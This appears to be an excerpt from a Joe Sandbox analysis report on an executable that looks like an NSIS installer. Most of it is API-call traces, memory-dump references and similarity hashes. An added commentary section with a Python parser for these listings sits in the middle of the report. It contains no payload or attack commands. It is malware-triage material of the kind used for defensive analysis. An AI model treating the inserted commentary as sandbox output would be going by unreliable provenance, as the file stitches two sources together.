                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\450707124374000811.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-3397512346
                                                          • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                          • Instruction ID: 662237d401549a0b86d5a4e6e01ff77a7750504751085e1aca306c60b5ffe750
                                                          • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                          • Instruction Fuzzy Hash: 3911B655800612A5D7303B18BC40AB776B8EF68750B52403FED8A732C5E77C5CA286BD
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040429B
                                                          • GetSysColor.USER32(00000000), ref: 004042B7
                                                          • SetTextColor.GDI32(?,00000000), ref: 004042C3
                                                          • SetBkMode.GDI32(?,?), ref: 004042CF
                                                          • GetSysColor.USER32(?), ref: 004042E2
                                                          • SetBkColor.GDI32(?,?), ref: 004042F2
                                                          • DeleteObject.GDI32(?), ref: 0040430C
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404316
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                          • Instruction ID: b3876bbcbbff373df079470ccdc5149205509338ab7e68b668f4883140def8c6
                                                          • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                          • Instruction Fuzzy Hash: B22151B1600704ABCB219F68DE08B5BBBF8AF41714F04897DFD96E26A0D734E944CB64
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                          • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2482210897.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.2482282589.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.2482380281.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                          • String ID: @Hmu
                                                          • API String ID: 4216380887-887474944
                                                          • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                          • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                          • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                          • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                          APIs
                                                          • lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                          • lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                          • lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                          • SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                          • Instruction ID: 0b7e0c68d9dca976d3f5af37e2abe0e5b3dfc86658143eccbc3f009734cc3570
                                                          • Opcode Fuzzy Hash: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                          • Instruction Fuzzy Hash: 3F21A171900518BACF11AFA5DD859CFBFB4EF85350F14817AF944B6290C7B98A90CFA8
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BCB
                                                          • GetMessagePos.USER32 ref: 00404BD3
                                                          • ScreenToClient.USER32(?,?), ref: 00404BED
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFF
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C25
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                          • Instruction ID: fcc096391eddebe8eb85a5aa76d4b30f922b4a39187f2a8acbab72006efdbce5
                                                          • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                          • Instruction Fuzzy Hash: 31015E71900218BAEB10DB94DD85BFEBBBCAF95B11F10412BBA50B62D0D7B499418BA4
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                          • MulDiv.KERNEL32(000F45F7,00000064,000F47FB), ref: 00402E20
                                                          • wsprintfW.USER32 ref: 00402E30
                                                          • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 00402E2A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                          • Instruction ID: 0244175548504e0de7267acb57bf05e9e9b1595e8d7e84e5cb6d98a661a40fbb
                                                          • Opcode Fuzzy Hash: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                          • Instruction Fuzzy Hash: B6014470640208BBDF209F50DE49FAA3B69BB00304F008039FA46A51D0DBB889558B59
                                                          APIs
                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                          • GlobalFree.KERNEL32(?), ref: 1000256D
                                                          • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2482210897.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.2482282589.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.2482380281.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                          • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                          • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                          • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                          • GlobalFree.KERNEL32(?), ref: 00402950
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                          • Instruction ID: c7dec26b55dd312fec5fb3faf1598927ec34475db9096b9e5e75d52a628400f5
                                                          • Opcode Fuzzy Hash: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                          • Instruction Fuzzy Hash: E521BDB1C00128BBDF216FA5DE49D9E7E79EF08364F10423AF964762E0CB794C418B98
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsqA869.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsqA869.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWidelstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsqA869.tmp$C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll
                                                          • API String ID: 3109718747-3005640722
                                                          • Opcode ID: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                          • Instruction ID: 59cf546ef3811be8ee7c727c8e5eea11e2141b44b9e391d5d171073bbb1e77e0
                                                          • Opcode Fuzzy Hash: 07d53d2b07502590e3e1b39d6501f1557fe553bf4e29e33a0fbec8c4be15c9f1
                                                          • Instruction Fuzzy Hash: F611EB72A01204BEDB146FB18E8EA9F77659F45398F20453BF102F61C1DAFC89415B5E
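The entry above is the shape every "APIs" block in this report takes: one bullet per resolved call, the exporting module after the dot, the argument values Joe Sandbox could recover (file paths rendered inline, `?` for unknowns) and the call-site address after `ref:`. This particular WideCharToMultiByte/lstrlenA pair is worth isolating because the path it handles, C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll, is a DLL staged in an NSIS plugin directory: NSIS installer stubs extract their plugins into %TEMP%\ns<id>.tmp\ before loading them, so a DLL there is installer plugin staging rather than a payload written to a persistent location. The parser below is an added example and is not part of the Joe Sandbox report or its tooling. It reads entries in this rendered format, collects the Windows paths from their arguments and flags DLLs under an NSIS staging directory. The sample entries are copied from this report's own listing; the format assumptions (arguments split on commas with no embedded commas, eight-hex-digit call-site addresses, the `Part of subcall function` prefix for nested calls) are mine.

```python
"""Parse the 'APIs' entries of a Joe Sandbox function listing and pull out
the file-system paths the function touched, flagging DLLs staged in an
NSIS plugin directory (%TEMP%\\ns<id>.tmp\\)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# Constructed sample: entries copied from this report's own rendered listing,
# not a live sandbox feed. Paths appear exactly as Joe Sandbox prints them.
SAMPLE = r"""
• WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsqA869.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
• lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsqA869.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsqA869.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
• CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\450707124374000811.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
• GetMessagePos.USER32 ref: 00404BD3
  • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
"""

# Assumed entry grammar (mine, derived from the rendered report, not a Joe
# Sandbox specification): bullet, optional subcall prefix, Api.MODULE,
# optional "(args)", then ", ref: <8 hex digits>".
ENTRY = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>\w+)\.(?P<module>[A-Za-z0-9]+)"   # e.g. lstrlenA.KERNEL32
    r"(?:\((?P<args>.*)\))?"                    # argument list, if rendered
    r",? ref: (?P<ref>[0-9A-Fa-f]{8})\s*$"      # call-site address
)

# An argument Joe Sandbox resolved to a Windows path, optionally quoted.
PATH = re.compile(r'^"?([A-Za-z]:\\[^"]*)"?$')

# NSIS unpacks its plugins into %TEMP%\ns<id>.tmp\ before loading them.
NSIS_PLUGIN = re.compile(r"\\Temp\\ns[0-9A-Za-z]+\.tmp\\[^\\]+\.dll$", re.IGNORECASE)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                      # call-site address from 'ref:'
    parent: Optional[int] = None  # set for 'Part of subcall function' lines


def parse_entries(text: str) -> List[ApiCall]:
    """Turn the rendered 'APIs' bullets into ApiCall records; skips headings."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue  # 'APIs' / 'Strings' headings, blank lines, non-call text
        raw = m.group("args")
        args = raw.split(",") if raw else []
        parent = m.group("parent")
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("module"),
            args=args,
            ref=int(m.group("ref"), 16),
            parent=int(parent, 16) if parent else None,
        ))
    return calls


def file_paths(calls: List[ApiCall]) -> Set[str]:
    """Every argument that resolved to a Windows path, with quotes stripped."""
    found: Set[str] = set()
    for call in calls:
        for arg in call.args:
            m = PATH.match(arg)
            if m:
                found.add(m.group(1))
    return found


def nsis_plugin_drops(calls: List[ApiCall]) -> Set[str]:
    """DLL paths inside an NSIS plugin staging directory (%TEMP%\\ns<id>.tmp\\)."""
    return {p for p in file_paths(calls) if NSIS_PLUGIN.search(p)}


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for c in parsed:
        nested = f" (subcall of {c.parent:08X})" if c.parent is not None else ""
        print(f"{c.ref:08X} {c.api}.{c.module} {len(c.args)} args{nested}")
    print("paths:", sorted(file_paths(parsed)))
    print("NSIS plugin DLLs:", sorted(nsis_plugin_drops(parsed)))
```

Run it against a whole report by feeding the text of every "APIs" block to `parse_entries`; the staging-directory match is the quick way to separate NSIS plugin DLLs (System.dll and friends) from any PE the installer writes elsewhere, which is the "dropped PE file" a triage analyst actually wants to pull.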
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2482210897.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.2482282589.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.2482380281.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: FreeGlobal
                                                          • String ID:
                                                          • API String ID: 2979337801-0
                                                          • Opcode ID: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                          • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                          • Opcode Fuzzy Hash: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
                                                          • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401DB6
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                          • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                          • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E38
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                          • String ID:
                                                          • API String ID: 3808545654-0
                                                          • Opcode ID: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                          • Instruction ID: 8058adb7fc53f801c03006c9ef56a62efa99793a140a93f16ed6c143b7d909dc
                                                          • Opcode Fuzzy Hash: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                          • Instruction Fuzzy Hash: 9A015271944240EFE701ABB4AE8A6D97FB49F95301F10457EE241F61E2CAB800459F2D
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2482263763.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2482210897.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.2482282589.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000000.00000002.2482380281.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                          • String ID:
                                                          • API String ID: 1148316912-0
                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                          • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                          • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2467502248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2467488389.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467525921.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467545091.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2467643039.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_450707124374000811.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
                                                          • Instruction ID: face61d34558c4de7c2b3a6e9a6cb1e1a296a7661f17e088ac2b3614559d71e0
                                                          • Opcode Fuzzy Hash: 9ccf06a462700f0ed3a97b5983b11f9e7e1ee2bcf46f86b5230f61e7ee9921c4
